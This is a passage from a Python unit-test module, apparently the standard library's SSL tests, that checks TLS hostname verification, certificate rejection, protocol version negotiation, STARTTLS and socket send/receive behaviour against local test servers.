server_context.load_cert_chain(IDNSANSFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify, when specified in several
# different ways
idn_hostnames = [
('könig.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
(b'xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('königsgäßchen.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
('xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
(b'xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
# ('königsgäßchen.idna2008.pythontest.net',
# 'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
('xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
(b'xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
]
for server_hostname, expected_hostname in idn_hostnames:
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=server_hostname) as s:
self.assertEqual(s.server_hostname, expected_hostname)
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertEqual(s.server_hostname, expected_hostname)
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="python.example.org") as s:
with self.assertRaises(ssl.CertificateError):
s.connect((HOST, server.port))
def test_wrong_cert_tls12(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
# require TLS client authentication
server_context.verify_mode = ssl.CERT_REQUIRED
# TLS 1.3 has different handshake
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
@unittest.skipUnless(ssl.HAS_TLSv1_3, "Test needs TLS 1.3")
def test_wrong_cert_tls13(self):
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
server_context.verify_mode = ssl.CERT_REQUIRED
server_context.minimum_version = ssl.TLSVersion.TLSv1_3
client_context.minimum_version = ssl.TLSVersion.TLSv1_3
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# TLS 1.3 perform client cert exchange after handshake
s.connect((HOST, server.port))
try:
s.write(b'data')
s.read(4)
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = test_wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
def test_ssl_cert_verify_error(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
try:
s.connect((HOST, server.port))
except ssl.SSLError as e:
msg = 'unable to get local issuer certificate'
self.assertIsInstance(e, ssl.SSLCertVerificationError)
self.assertEqual(e.verify_code, 20)
self.assertEqual(e.verify_message, msg)
self.assertIn(msg, repr(e))
self.assertIn('certificate verify failed', repr(e))
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
"OpenSSL is compiled without SSLv2 support")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
def test_PROTOCOL_TLS(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1')
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
"OpenSSL is compiled without SSLv3 support")
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS,
False, client_options=ssl.OP_NO_SSLv2)
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
"TLS version 1.1 not supported.")
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
"TLS version 1.2 not supported.")
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = test_wrap_socket(s)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using socketserver to create and manage SSL connections."""
server = make_https_server(self, certfile=SIGNED_CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=SIGNING_CA)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = test_wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_CLIENT)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, expect success?, *args, return value func)
send_methods = [
('send', s.send, True, [], len),
('sendto', s.sendto, False, ["some.address"], len),
('sendall', s.sendall, True, [], lambda x: None),
]
# (name, method, whether to expect success, *args)
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for (meth_name, send_meth, expect_success, args,
ret_val_meth) in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
ret = send_meth(indata, *args)
msg = "sending with {}".format(meth_name)
self.assertEqual(ret, ret_val_meth(indata), msg=msg)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# read(-1, buffer) is supported, even though read(-1) is not
data = b"data"
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
# sendall accepts bytes-like objects
if ctypes is not None:
ubyte = ctypes.c_ubyte * len(data)
byteslike = ubyte.from_buffer_copy(data)
s.sendall(byteslike)
self.assertEqual(s.read(), data)
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.dup)
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, [bytearray(100)])
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
def test_recv_zero(self):
server = ThreadedEchoServer(CERTFILE)
server.__enter__()
self.addCleanup(server.__exit__, None, None)
s = socket.create_connection((HOST, server.port))
self.addCleanup(s.close)
s = test_wrap_socket(s, suppress_ragged_eofs=False)
self.addCleanup(s.close)
# recv/read(0) should return no data
s.send(b"data")
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), b"data")
# Should not block if the other end sends no data
s.setblocking(False)
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.recv_into(bytearray()), 0)
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_CLIENT)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
test_wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = test_wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
context.load_cert_chain(SIGNED_CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
self.assertTrue(server.server_side)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.send(remote.recv(4))
t = threading.Thread(target=serve)
t.start()
# Client wait until server setup and perform a connect.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client.send(b'data')
client.recv()
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_no_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
# OpenSSL enables all TLS 1.3 ciphers, enforce TLS 1.2 for test
client_context.options |= ssl.OP_NO_TLSv1_3
# Force different suites on client and server
client_context.set_ciphers("AES128")
server_context.set_ciphers("AES256")
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", server.conn_errors[0])
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
self.assertIs(s._sslobj, None)
s.connect((HOST, server.port))
if IS_OPENSSL_1_1_1 and ssl.HAS_TLSv1_3:
self.assertEqual(s.version(), 'TLSv1.3')
elif ssl.OPENSSL_VERSION_INFO >= (1, 0, 2):
self.assertEqual(s.version(), 'TLSv1.2')
else: # 0.9.8 to 1.0.1
self.assertIn(s.version(), ('TLSv1', 'TLSv1.2'))
self.assertIs(s._sslobj, None)
self.assertIs(s.version(), None)
@unittest.skipUnless(ssl.HAS_TLSv1_3,
"test requires TLSv1.3 enabled OpenSSL")
def test_tls1_3(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.load_cert_chain(CERTFILE)
context.options |= (
ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1 | ssl.OP_NO_TLSv1_2
)
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn(s.cipher()[0], {
'TLS_AES_256_GCM_SHA384',
'TLS_CHACHA20_POLY1305_SHA256',
'TLS_AES_128_GCM_SHA256',
})
self.assertEqual(s.version(), 'TLSv1.3')
@unittest.skipUnless(hasattr(ssl.SSLContext, 'minimum_version'),
"required OpenSSL 1.1.0g")
def test_min_max_version(self):
client_context, server_context, hostname = testing_context()
# client TLSv1.0 to 1.2
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# server only TLSv1.2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.2')
# client 1.0 to 1.2, server 1.0 to 1.1
server_context.minimum_version = ssl.TLSVersion.TLSv1
server_context.maximum_version = ssl.TLSVersion.TLSv1_1
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.1')
# client 1.0, server 1.2 (mismatch)
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(ssl.SSLError) as e:
s.connect((HOST, server.port))
self.assertIn("alert", str(e.exception))
@unittest.skipUnless(hasattr(ssl.SSLContext, 'minimum_version'),
"required OpenSSL 1.1.0g")
@unittest.skipUnless(ssl.HAS_SSLv3, "requires SSLv3 support")
def test_min_max_version_sslv3(self):
client_context, server_context, hostname = testing_context()
server_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.maximum_version = ssl.TLSVersion.SSLv3
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'SSLv3')
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.load_cert_chain(CERTFILE)
# TLSv1.3 defaults to PFS key agreement and no longer has KEA in
# cipher name.
context.options |= ssl.OP_NO_TLSv1_3
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context,
chatty=True,
connectionchatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
" got channel binding data: {0!r}\n".format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
# now, again
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
"got another channel binding data: {0!r}\n".format(
new_cb_data)
)
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
